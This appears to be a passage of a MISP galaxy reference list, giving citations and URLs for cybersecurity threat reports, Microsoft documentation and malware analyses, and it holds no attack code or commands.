https://security.web.cern.ch/advisories/windigo/windigo.shtml

CrowdStrike GTR 2019

CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="CrowdStrike GTR 2019"

Table 12406. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2019GlobalThreatReport.pdf

Crowdstrike GTR2020 Mar 2020

Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.

The tag is: misp-galaxy:references="Crowdstrike GTR2020 Mar 2020"

Table 12407. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

RecordedFuture 2021 Ad Infra

Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="RecordedFuture 2021 Ad Infra"

Table 12408. Table References

Links

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

Red Canary 2021 Threat Detection Report March 2021

Red Canary. (2021, March 31). 2021 Threat Detection Report. Retrieved August 31, 2021.

The tag is: misp-galaxy:references="Red Canary 2021 Threat Detection Report March 2021"

Table 12409. Table References

Links

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf?mkt_tok=MDAzLVlSVS0zMTQAAAF_PIlmhNTaG2McG4X_foM-cIr20UfyB12MIQ10W0HbtMRwxGOJaD0Xj6CRTNg_S-8KniRxtf9xzhz_ACvm_TpbJAIgWCV8yIsFgbhb8cuaZA

ACSC BlackCat Apr 2022

Australian Cyber Security Centre. (2022, April 14). 2022-004: ACSC Ransomware Profile - ALPHV (aka BlackCat). Retrieved December 20, 2022.

The tag is: misp-galaxy:references="ACSC BlackCat Apr 2022"

Table 12410. Table References

Links

https://www.cyber.gov.au/about-us/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

Internet crime report 2022

IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="Internet crime report 2022"

Table 12411. Table References

Links

https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

RC PowerShell

Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="RC PowerShell"

Table 12412. Table References

Links

https://redcanary.com/threat-detection-report/techniques/powershell/

20 macOS Common Tools and Techniques

Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="20 macOS Common Tools and Techniques"

Table 12413. Table References

Links

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Microsoft GPP Key

Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft GPP Key"

Table 12414. Table References

Links

https://msdn.microsoft.com/library/cc422924.aspx

Microsoft _VBA_PROJECT Stream

Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.

The tag is: misp-galaxy:references="Microsoft _VBA_PROJECT Stream"

Table 12415. Table References

Links

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239

Microsoft Learn

Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Microsoft Learn"

Table 12416. Table References

Links

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1

Hybrid Analysis Icacls2 May 2018

Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="Hybrid Analysis Icacls2 May 2018"

Table 12417. Table References

Links

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

Microsoft Wow6432Node 2018

Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020.

The tag is: misp-galaxy:references="Microsoft Wow6432Node 2018"

Table 12418. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry

DOJ-DPRK Heist

Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="DOJ-DPRK Heist"

Table 12419. Table References

Links

https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and

ITWorld Hard Disk Health Dec 2014

Pinola, M. (2014, December 14). 3 tools to check your hard drive’s health and make sure it’s not already dying on you. Retrieved October 2, 2018.

The tag is: misp-galaxy:references="ITWorld Hard Disk Health Dec 2014"

Table 12420. Table References

Links

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Microsoft 4657 APR 2017

Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Microsoft 4657 APR 2017"

Table 12421. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657

Microsoft 4697 APR 2017

Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft 4697 APR 2017"

Table 12422. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

Microsoft User Creation Event

Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Microsoft User Creation Event"

Table 12423. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Microsoft User Modified Event

Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.

The tag is: misp-galaxy:references="Microsoft User Modified Event"

Table 12424. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738

Microsoft 4768 TGT 2017

Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Microsoft 4768 TGT 2017"

Table 12425. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768

HIPAA Journal S3 Breach, 2017

HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="HIPAA Journal S3 Breach, 2017"

Table 12426. Table References

Links

https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/

Slack Security Risks

Michael Osakwe. (2020, November 18). 4 SaaS and Slack Security Risks to Consider. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Slack Security Risks"

Table 12427. Table References

Links

https://www.nightfall.ai/blog/saas-slack-security-risks-2020

PurpleSec Data Loss Prevention

Michael Swanagan. (2020, October 24). 7 Data Loss Prevention Best Practices & Strategies. Retrieved August 30, 2021.

The tag is: misp-galaxy:references="PurpleSec Data Loss Prevention"

Table 12428. Table References

Links

https://purplesec.us/data-loss-prevention/

7zip Homepage

  1. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="7zip Homepage"

Table 12429. Table References

Links

https://www.7-zip.org/

MicroFocus 9002 Aug 2016

Petrovsky, O. (2016, August 30). “9002 RAT” — a second building on the left. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="MicroFocus 9002 Aug 2016"

Table 12430. Table References

Links

https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ

CISA AA21-200A APT40 July 2021

CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.

The tag is: misp-galaxy:references="CISA AA21-200A APT40 July 2021"

Table 12431. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

AADInternals

Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="AADInternals"

Table 12432. Table References

Links

https://o365blog.com/aadinternals/

AADInternals Documentation

Dr. Nestori Syynimaa. (2018, October 25). AADInternals. Retrieved February 18, 2022.

The tag is: misp-galaxy:references="AADInternals Documentation"

Table 12433. Table References

Links

https://o365blog.com/aadinternals

AADInternals Github

Dr. Nestori Syynimaa. (2021, December 13). AADInternals. Retrieved February 1, 2022.

The tag is: misp-galaxy:references="AADInternals Github"

Table 12434. Table References

Links

https://github.com/Gerenios/AADInternals

Gigamon BADHATCH Jul 2019

Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8’s Tooling. Retrieved September 8, 2021.

The tag is: misp-galaxy:references="Gigamon BADHATCH Jul 2019"

Table 12435. Table References

Links

https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/

bad_luck_blackcat

Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="bad_luck_blackcat"

Table 12436. Table References

Links

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

Cybereason Bazar July 2020

Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.

The tag is: misp-galaxy:references="Cybereason Bazar July 2020"

Table 12437. Table References

Links

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

Red Canary Hospital Thwarted Ryuk October 2020

Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.

The tag is: misp-galaxy:references="Red Canary Hospital Thwarted Ryuk October 2020"

Table 12438. Table References

Links

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

CyberCX Anonymous Sudan June 19 2023

CyberCX Intelligence. (2023, June 19). A bear in wolf’s clothing: Insights into the infrastructure used by Anonymous Sudan to attack Australian organisations. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="CyberCX Anonymous Sudan June 19 2023"

Table 12439. Table References

Links

https://cybercx.com.au/blog/a-bear-in-wolfs-clothing/

Netskope Cloud Phishing

Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Netskope Cloud Phishing"

Table 12440. Table References

Links

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

Microsoft O365 Admin Roles

Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Microsoft O365 Admin Roles"

Table 12441. Table References

Links

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

Microsoft Atom Table

Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="Microsoft Atom Table"

Table 12442. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx

Microsoft About BITS

Microsoft. (2019, July 12). About BITS. Retrieved March 16, 2020.

The tag is: misp-galaxy:references="Microsoft About BITS"

Table 12443. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/bits/about-bits

Microsoft About Event Tracing 2018

Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Microsoft About Event Tracing 2018"

Table 12444. Table References

Links

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

Microsoft PowerShell Command History

Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.

The tag is: misp-galaxy:references="Microsoft PowerShell Command History"

Table 12445. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

Microsoft List View Controls

Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.

The tag is: misp-galaxy:references="Microsoft List View Controls"

Table 12446. Table References

Links

https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview

Microsoft PowerShell Logging

Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft PowerShell Logging"

Table 12447. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7

Apple About Mac Scripting 2016

Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Apple About Mac Scripting 2016"

Table 12448. Table References

Links

https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html

PowerShell About 2019

Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="PowerShell About 2019"

Table 12449. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Microsoft PowerShellB64

Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Microsoft PowerShellB64"

Table 12450. Table References

Links

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand

Microsoft Profiles

Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.

The tag is: misp-galaxy:references="Microsoft Profiles"

Table 12451. Table References

Links

https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles

Microsoft About Profiles

Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="Microsoft About Profiles"

Table 12452. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

Microsoft Remote Desktop Services

Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.

The tag is: misp-galaxy:references="Microsoft Remote Desktop Services"

Table 12453. Table References

Links

https://docs.microsoft.com/windows/win32/termserv/about-terminal-services

MSDN Clipboard

Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.

The tag is: misp-galaxy:references="MSDN Clipboard"

Table 12454. Table References

Links

https://msdn.microsoft.com/en-us/library/ms649012

Microsoft HTML Help Executable Program

Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help Executable Program"

Table 12455. Table References

Links

https://msdn.microsoft.com/windows/desktop/ms524405

About UEFI

UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="About UEFI"

Table 12456. Table References

Links

http://www.uefi.org/about

Microsoft Window Classes

Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft Window Classes"

Table 12457. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

Picus Sodinokibi January 2020

Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="Picus Sodinokibi January 2020"

Table 12458. Table References

Links

https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware

Application Bundle Manipulation Brandon Dalton

Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Application Bundle Manipulation Brandon Dalton"

Table 12459. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

NCC Group Chimera January 2021

Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.

The tag is: misp-galaxy:references="NCC Group Chimera January 2021"

Table 12460. Table References

Links

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

Harmj0y Abusing GPO Permissions

Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Harmj0y Abusing GPO Permissions"

Table 12461. Table References

Links

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

Retwin Directory Share Pivot

Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.

The tag is: misp-galaxy:references="Retwin Directory Share Pivot"

Table 12462. Table References

Links

https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html

BOHOPS Abusing the COM Registry

BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="BOHOPS Abusing the COM Registry"

Table 12463. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

abusing_com_reg

bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="abusing_com_reg"

Table 12464. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

Rhino Security Labs AWS VPC Traffic Mirroring

Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs AWS VPC Traffic Mirroring"

Table 12465. Table References

Links

https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/

Narrator Accessibility Abuse

Comi, G. (2019, October 19). Abusing Windows 10 Narrator’s 'Feedback-Hub' URI for Fileless Persistence. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="Narrator Accessibility Abuse"

Table 12466. Table References

Links

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

Intezer ACBackdoor

Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Intezer ACBackdoor"

Table 12467. Table References

Links

https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/

AccCheckConsole.exe - LOLBAS Project

LOLBAS. (2022, January 2). AccCheckConsole.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AccCheckConsole.exe - LOLBAS Project"

Table 12468. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/

CyberScoop APT28 Nov 2018

Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.

The tag is: misp-galaxy:references="CyberScoop APT28 Nov 2018"

Table 12469. Table References

Links

https://www.cyberscoop.com/apt28-brexit-phishing-accenture/

Microsoft Azure Kubernetes Service Service Accounts

Microsoft Azure. (2023, April 28). Access and identity options for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Kubernetes Service Service Accounts"

Table 12470. Table References

Links

https://learn.microsoft.com/en-us/azure/aks/concepts-identity

CrowdStrike Access Brokers

CrowdStrike Intelligence Team. (2022, February 23). Access Brokers: Who Are the Targets, and What Are They Worth?. Retrieved March 10, 2023.

The tag is: misp-galaxy:references="CrowdStrike Access Brokers"

Table 12471. Table References

Links

https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/

Microsoft Access Control Lists May 2018

  1. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.

The tag is: misp-galaxy:references="Microsoft Access Control Lists May 2018"

Table 12472. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists

Auth0 Access Tokens

Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Auth0 Access Tokens"

Table 12473. Table References

Links

https://auth0.com/docs/tokens/access-tokens

BSidesSLC 2020 - LNK Elastic

French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.

The tag is: misp-galaxy:references="BSidesSLC 2020 - LNK Elastic"

Table 12474. Table References

Links

https://www.youtube.com/watch?v=nJ0UsyiUEqQ

Mythic SpecterOps

Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Mythic SpecterOps"

Table 12475. Table References

Links

https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617

FireEye Chinese Espionage October 2019

Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="FireEye Chinese Espionage October 2019"

Table 12476. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

Unit42 AcidBox June 2020

Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Unit42 AcidBox June 2020"

Table 12477. Table References

Links

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

acroread package compromised Arch Linux Mail 8JUL2018

Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="acroread package compromised Arch Linux Mail 8JUL2018"

Table 12478. Table References

Links

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

Microsoft Actinium February 2022

Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.

The tag is: misp-galaxy:references="Microsoft Actinium February 2022"

Table 12479. Table References

Links

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Wikipedia Active Directory

Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Wikipedia Active Directory"

Table 12480. Table References

Links

https://en.wikipedia.org/wiki/Active_Directory

Microsoft AD Accounts

Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft AD Accounts"

Table 12481. Table References

Links

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts

Microsoft AD Admin Tier Model

Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Microsoft AD Admin Tier Model"

Table 12482. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN

Microsoft AD CS Overview

Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="Microsoft AD CS Overview"

Table 12483. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)

Microsoft Get-ADUser

Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Get-ADUser"

Table 12484. Table References

Links

https://technet.microsoft.com/library/ee617241.aspx

Active Directory Enumeration with LDIFDE

Microsoft. (2023, June 26). Active Directory Enumeration with LDIFDE. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Active Directory Enumeration with LDIFDE"

Table 12485. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md#atomic-test-14---active-directory-enumeration-with-ldifde

Microsoft SID-History Attribute

Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID-History Attribute"

Table 12486. Table References

Links

https://msdn.microsoft.com/library/ms679833.aspx

ActiveMalwareEnergy

Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="ActiveMalwareEnergy"

Table 12487. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

Klein Active Setup 2010

Klein, H. (2010, April 22). Active Setup Explained. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Klein Active Setup 2010"

Table 12488. Table References

Links

https://helgeklein.com/blog/2010/04/active-setup-explained/

Dark Vortex Brute Ratel C4

Dark Vortex. (n.d.). A Customized Command and Control Center for Red Team and Adversary Simulation. Retrieved February 7, 2023.

The tag is: misp-galaxy:references="Dark Vortex Brute Ratel C4"

Table 12489. Table References

Links

https://bruteratel.com/

ad_blocker_with_miner

Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.

The tag is: misp-galaxy:references="ad_blocker_with_miner"

Table 12490. Table References

Links

https://securelist.com/ad-blocker-with-miner-included/101105/

Microsoft Support O365 Add Another Admin, October 2019

Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Microsoft Support O365 Add Another Admin, October 2019"

Table 12491. Table References

Links

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

Amazon AWS IMDS V2

MacCarthaigh, C. (2019, November 19). Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service. Retrieved October 14, 2020.

The tag is: misp-galaxy:references="Amazon AWS IMDS V2"

Table 12492. Table References

Links

https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/

Adding Login Items

Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Adding Login Items"

Table 12493. Table References

Links

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

MRWLabs Office Persistence Add-ins

Knowles, W. (2017, April 21). Add-In Opportunities for Office Persistence. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="MRWLabs Office Persistence Add-ins"

Table 12494. Table References

Links

https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

AddinUtil.exe - LOLBAS Project

LOLBAS. (2023, October 5). AddinUtil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AddinUtil.exe - LOLBAS Project"

Table 12495. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Addinutil/

Microsoft - Add-MailboxPermission

Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Microsoft - Add-MailboxPermission"

Table 12496. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps

AddMonitor

Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="AddMonitor"

Table 12497. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

Microsoft Azure AD Users

Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="Microsoft Azure AD Users"

Table 12498. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory

Microsoft Office Add-ins

Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Microsoft Office Add-ins"

Table 12499. Table References

Links

https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460

Microsoft AddPrintProcessor May 2018

Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.

The tag is: misp-galaxy:references="Microsoft AddPrintProcessor May 2018"

Table 12500. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor

RFC1918

IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="RFC1918"

Table 12501. Table References

Links

https://tools.ietf.org/html/rfc1918

Microsoft Exchange Address Lists

Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="Microsoft Exchange Address Lists"

Table 12502. Table References

Links

https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019

Microsoft AD DS Getting Started

Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Microsoft AD DS Getting Started"

Table 12503. Table References

Links

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started

Akamai DGA Mitigation

Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Akamai DGA Mitigation"

Table 12504. Table References

Links

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

Keychain Decryption Passware

Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="Keychain Decryption Passware"

Table 12505. Table References

Links

https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption

Trend Micro Deep Dive Into Defacement

